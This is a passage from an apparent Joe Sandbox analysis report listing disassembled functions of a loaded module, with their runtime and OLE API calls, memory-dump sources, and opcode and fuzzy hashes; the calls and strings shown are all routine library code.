                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Exception@8Throw$ExceptionRaise
                                                                      • String ID: Cryptographic algorithms are disabled after a power-up self test failed.$Cryptographic algorithms are disabled before the power-up self tests are performed.
                                                                      • API String ID: 3476068407-3345525433
                                                                      • Opcode ID: de7a2c1685e99cace5a617a9ed89c94d2bd28b6765fd6bbdc29cea539792dec8
                                                                      • Instruction ID: aac7e398ea55330681fa0c02aa4ebdf9a2bbf27e89e54e70dee05a9d253f0690
                                                                      • Opcode Fuzzy Hash: de7a2c1685e99cace5a617a9ed89c94d2bd28b6765fd6bbdc29cea539792dec8
                                                                      • Instruction Fuzzy Hash: B121C071518380AFD724EF74C944F9BB3E8BF86698F404A2DF585832C5EB35A158CA63
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0B5160 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 6F0B5173
                                                                        • Part of subcall function 6F1090D8: std::exception::exception.LIBCMT ref: 6F1090ED
                                                                        • Part of subcall function 6F1090D8: __CxxThrowException@8.LIBCMT ref: 6F109102
                                                                        • Part of subcall function 6F1090D8: std::exception::exception.LIBCMT ref: 6F109113
                                                                      • _memmove.LIBCMT ref: 6F0B519E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                      • String ID: n/o$vector<T> too long
                                                                      • API String ID: 1785806476-2123610845
                                                                      • Opcode ID: b6305c4e5987edf0bf0bb64acdd0c82110a6c61ddc8ea3e3e064c002d854245a
                                                                      • Instruction ID: 08bdf6785f7cdfaf8ad8a1511481023e444fe1582181539b2d9fc3bc938518d5
                                                                      • Opcode Fuzzy Hash: b6305c4e5987edf0bf0bb64acdd0c82110a6c61ddc8ea3e3e064c002d854245a
                                                                      • Instruction Fuzzy Hash: 62014FB16002099FD728DEA8CCA196AB3E9EB54254754492DE85AC3788EB32F910CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0C5380 Relevance: 6.2, APIs: 4, Instructions: 215COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 6F109BB5: _malloc.LIBCMT ref: 6F109BCF
                                                                      • std::exception::exception.LIBCMT ref: 6F0C5488
                                                                      • __CxxThrowException@8.LIBCMT ref: 6F0C549F
                                                                      • std::exception::exception.LIBCMT ref: 6F0C5581
                                                                        • Part of subcall function 6F109533: std::exception::_Copy_str.LIBCMT ref: 6F10954E
                                                                      • __CxxThrowException@8.LIBCMT ref: 6F0C5598
                                                                        • Part of subcall function 6F10AC75: RaiseException.KERNEL32(?,?,6F109C34,F3D820D6,?,?,?,?,6F109C34,F3D820D6,6F139C90,6F14B974,F3D820D6), ref: 6F10ACB7
                                                                        • Part of subcall function 6F0D3690: _memset.LIBCMT ref: 6F0D36E3
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaise_malloc_memsetstd::exception::_
                                                                      • String ID:
                                                                      • API String ID: 2530845297-0
                                                                      • Opcode ID: 1de59f10220eb2b8ac6229c6d983c68d4d231f3771c672f0783748b80fb1f797
                                                                      • Instruction ID: 4b1f842264fc6fc38ee4b7b61339e664c016188ed27e2b1a61d758472875dbc7
                                                                      • Opcode Fuzzy Hash: 1de59f10220eb2b8ac6229c6d983c68d4d231f3771c672f0783748b80fb1f797
                                                                      • Instruction Fuzzy Hash: B7718B755087059FCB04DF18D89099AB7F8FF89364F508A6EF8558B390EB30EA15CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0BD4B0 Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 6F109BB5: _malloc.LIBCMT ref: 6F109BCF
                                                                      • std::exception::exception.LIBCMT ref: 6F0BD5E4
                                                                      • __CxxThrowException@8.LIBCMT ref: 6F0BD5F9
                                                                      • std::exception::exception.LIBCMT ref: 6F0BD608
                                                                      • __CxxThrowException@8.LIBCMT ref: 6F0BD61D
                                                                        • Part of subcall function 6F109BB5: std::exception::exception.LIBCMT ref: 6F109C04
                                                                        • Part of subcall function 6F109BB5: std::exception::exception.LIBCMT ref: 6F109C1E
                                                                        • Part of subcall function 6F109BB5: __CxxThrowException@8.LIBCMT ref: 6F109C2F
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: std::exception::exception$Exception@8Throw$_malloc
                                                                      • String ID:
                                                                      • API String ID: 2621100827-0
                                                                      • Opcode ID: c56de9418336f37ff120311184143ad5cb6db7ad9329a5696690c6f034b63c67
                                                                      • Instruction ID: d77cafb837895c0a1234a6239417326182d54a24c295b0176d7bf9e6c19b8c3b
                                                                      • Opcode Fuzzy Hash: c56de9418336f37ff120311184143ad5cb6db7ad9329a5696690c6f034b63c67
                                                                      • Instruction Fuzzy Hash: 37513AB1A01649AFCB04DFA8C980A89FBF4FB08314F50826EE41997781D771F964CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0C5F00 Relevance: 6.1, APIs: 4, Instructions: 135COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 6F109BB5: _malloc.LIBCMT ref: 6F109BCF
                                                                      • std::exception::exception.LIBCMT ref: 6F0C6035
                                                                      • __CxxThrowException@8.LIBCMT ref: 6F0C604A
                                                                      • std::exception::exception.LIBCMT ref: 6F0C6059
                                                                      • __CxxThrowException@8.LIBCMT ref: 6F0C606E
                                                                        • Part of subcall function 6F109BB5: std::exception::exception.LIBCMT ref: 6F109C04
                                                                        • Part of subcall function 6F109BB5: std::exception::exception.LIBCMT ref: 6F109C1E
                                                                        • Part of subcall function 6F109BB5: __CxxThrowException@8.LIBCMT ref: 6F109C2F
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: std::exception::exception$Exception@8Throw$_malloc
                                                                      • String ID:
                                                                      • API String ID: 2621100827-0
                                                                      • Opcode ID: 6683f6eaa858b8e6c8914fed7c6380f03830c02b2f3f0c9c00a22c5b1faeef00
                                                                      • Instruction ID: f224f098763922476d33dfb947df4eae75f4e69cb20bfecf19175502de9c7c82
                                                                      • Opcode Fuzzy Hash: 6683f6eaa858b8e6c8914fed7c6380f03830c02b2f3f0c9c00a22c5b1faeef00
                                                                      • Instruction Fuzzy Hash: 4C513AB1A00709AFC714CFA8C980A99BBF4FF09354F50826AE419D7B81D771F964CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0BDE50 Relevance: 6.1, APIs: 4, Instructions: 118COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$Clear$Init
                                                                      • String ID:
                                                                      • API String ID: 3740757921-0
                                                                      • Opcode ID: 9511547a9c8237a610d19729d4c8a18d8b99de9584948165f3d97a9b12d0f4a4
                                                                      • Instruction ID: 9eca52a012ab67db1dc74f4084036d1d6c6ecd0c2f1c00f5106c3167c358eee5
                                                                      • Opcode Fuzzy Hash: 9511547a9c8237a610d19729d4c8a18d8b99de9584948165f3d97a9b12d0f4a4
                                                                      • Instruction Fuzzy Hash: 26419A322096019FD700DF69C840B5AF7E6FF89760F044A6EF9549B350D732E805CBA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0C5DB0 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 6F109BB5: _malloc.LIBCMT ref: 6F109BCF
                                                                      • std::exception::exception.LIBCMT ref: 6F0C5E87
                                                                      • __CxxThrowException@8.LIBCMT ref: 6F0C5E9C
                                                                      • std::exception::exception.LIBCMT ref: 6F0C5EAB
                                                                      • __CxxThrowException@8.LIBCMT ref: 6F0C5EC0
                                                                        • Part of subcall function 6F109BB5: std::exception::exception.LIBCMT ref: 6F109C04
                                                                        • Part of subcall function 6F109BB5: std::exception::exception.LIBCMT ref: 6F109C1E
                                                                        • Part of subcall function 6F109BB5: __CxxThrowException@8.LIBCMT ref: 6F109C2F
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: std::exception::exception$Exception@8Throw$_malloc
                                                                      • String ID:
                                                                      • API String ID: 2621100827-0
                                                                      • Opcode ID: 0b45a1c54174df9a473f44be3277d9acdbc9e1286a1a5be09c1b5b242932b57e
                                                                      • Instruction ID: 10344265e88af0f13c3238c830a1dfb714129ca4238da2345653c06287165308
                                                                      • Opcode Fuzzy Hash: 0b45a1c54174df9a473f44be3277d9acdbc9e1286a1a5be09c1b5b242932b57e
                                                                      • Instruction Fuzzy Hash: 3F4149B19007489FC724CFA9C980A9AFBF4FB08344F40896EE85AA7781D771F504CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0BD360 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 6F109BB5: _malloc.LIBCMT ref: 6F109BCF
                                                                      • std::exception::exception.LIBCMT ref: 6F0BD437
                                                                      • __CxxThrowException@8.LIBCMT ref: 6F0BD44C
                                                                      • std::exception::exception.LIBCMT ref: 6F0BD45B
                                                                      • __CxxThrowException@8.LIBCMT ref: 6F0BD470
                                                                        • Part of subcall function 6F109BB5: std::exception::exception.LIBCMT ref: 6F109C04
                                                                        • Part of subcall function 6F109BB5: std::exception::exception.LIBCMT ref: 6F109C1E
                                                                        • Part of subcall function 6F109BB5: __CxxThrowException@8.LIBCMT ref: 6F109C2F
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: std::exception::exception$Exception@8Throw$_malloc
                                                                      • String ID:
                                                                      • API String ID: 2621100827-0
                                                                      • Opcode ID: 02fc3a200d16b49eb58df2604ef650383e4c5b7226df89d0fd602e01c07679ca
                                                                      • Instruction ID: 86c60990deab85053d36fdda1a5c588c4890032f43e006ba290e1dff743ef31c
                                                                      • Opcode Fuzzy Hash: 02fc3a200d16b49eb58df2604ef650383e4c5b7226df89d0fd602e01c07679ca
                                                                      • Instruction Fuzzy Hash: 924149B19007489FC724CFA9D880A8AFBF4FB09344F40896EE85A97741D771F504CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0CB580 Relevance: 6.1, APIs: 4, Instructions: 111COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(6F1202A0), ref: 6F0CB5D5
                                                                      • VariantInit.OLEAUT32(?), ref: 6F0CB5E2
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0CB685
                                                                      • VariantClear.OLEAUT32(6F1202A0), ref: 6F0CB68B
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit
                                                                      • String ID:
                                                                      • API String ID: 2610073882-0
                                                                      • Opcode ID: 844716851f9537c2a455dfab51bdc36dda5d06f5d5f8fcac1c79f70bcde0890a
                                                                      • Instruction ID: c33ccbbfd0104db94bed730253be17ef226a7a472c96c4b8180c11991a7003b5
                                                                      • Opcode Fuzzy Hash: 844716851f9537c2a455dfab51bdc36dda5d06f5d5f8fcac1c79f70bcde0890a
                                                                      • Instruction Fuzzy Hash: 3D416272A00209AFDB10DFA9C940B9AF7F9FF89354F20419AE904A7351D735F941CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0CDC40 Relevance: 6.1, APIs: 4, Instructions: 90COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • std::exception::exception.LIBCMT ref: 6F0CDCC5
                                                                        • Part of subcall function 6F109533: std::exception::_Copy_str.LIBCMT ref: 6F10954E
                                                                      • __CxxThrowException@8.LIBCMT ref: 6F0CDCDA
                                                                        • Part of subcall function 6F10AC75: RaiseException.KERNEL32(?,?,6F109C34,F3D820D6,?,?,?,?,6F109C34,F3D820D6,6F139C90,6F14B974,F3D820D6), ref: 6F10ACB7
                                                                        • Part of subcall function 6F109BB5: _malloc.LIBCMT ref: 6F109BCF
                                                                      • std::exception::exception.LIBCMT ref: 6F0CDD09
                                                                      • __CxxThrowException@8.LIBCMT ref: 6F0CDD1E
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaise_mallocstd::exception::_
                                                                      • String ID:
                                                                      • API String ID: 399550787-0
                                                                      • Opcode ID: 79aae93f61964d6ba89e60c0e035fc804e4e3c91fca09fcd80c76619d8f79c96
                                                                      • Instruction ID: 5ea616dde9281e53959f639fdef804ee47062c39dbaece26c47743dc717a4757
                                                                      • Opcode Fuzzy Hash: 79aae93f61964d6ba89e60c0e035fc804e4e3c91fca09fcd80c76619d8f79c96
                                                                      • Instruction Fuzzy Hash: B6314FB6D00309AFD704DF99D890A9EBBF9BF44350F40856EE91997350DB70EA14CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F112645 Relevance: 6.1, APIs: 4, Instructions: 68COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _malloc.LIBCMT ref: 6F112653
                                                                        • Part of subcall function 6F109D66: __FF_MSGBANNER.LIBCMT ref: 6F109D7F
                                                                        • Part of subcall function 6F109D66: __NMSG_WRITE.LIBCMT ref: 6F109D86
                                                                        • Part of subcall function 6F109D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,6F109BD4,6F0A1290,F3D820D6), ref: 6F109DAB
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap_malloc
                                                                      • String ID:
                                                                      • API String ID: 501242067-0
                                                                      • Opcode ID: 810f152a4b7d1f32e2b0503a479169ee7cd2e96b954989935aee1c0d84be91bf
                                                                      • Instruction ID: 49ce3ec5a7d2a3107a6ff4782d5bc904bdd0848c906bcfa8f9b01b6355c7f945
                                                                      • Opcode Fuzzy Hash: 810f152a4b7d1f32e2b0503a479169ee7cd2e96b954989935aee1c0d84be91bf
                                                                      • Instruction Fuzzy Hash: 4F11A332549B54ABCB21BF75A804A5D37A9AF573F5B110536EC489A2D0DF30E8B0CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0C5A70 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 6F0C5AB9
                                                                      • VariantCopy.OLEAUT32(?,6F139C90), ref: 6F0C5AC1
                                                                      • VariantClear.OLEAUT32(?), ref: 6F0C5AE2
                                                                      • __CxxThrowException@8.LIBCMT ref: 6F0C5AEF
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearCopyException@8InitThrow
                                                                      • String ID:
                                                                      • API String ID: 3826472263-0
                                                                      • Opcode ID: 1a3e63e35a022ae3fe23ae617eb751b45fc9220b2baa719390cd0b5f237d7152
                                                                      • Instruction ID: c34c0f8395542e53c15ca089885834df2a3f570bad17dbdc68783e47c0bbca8c
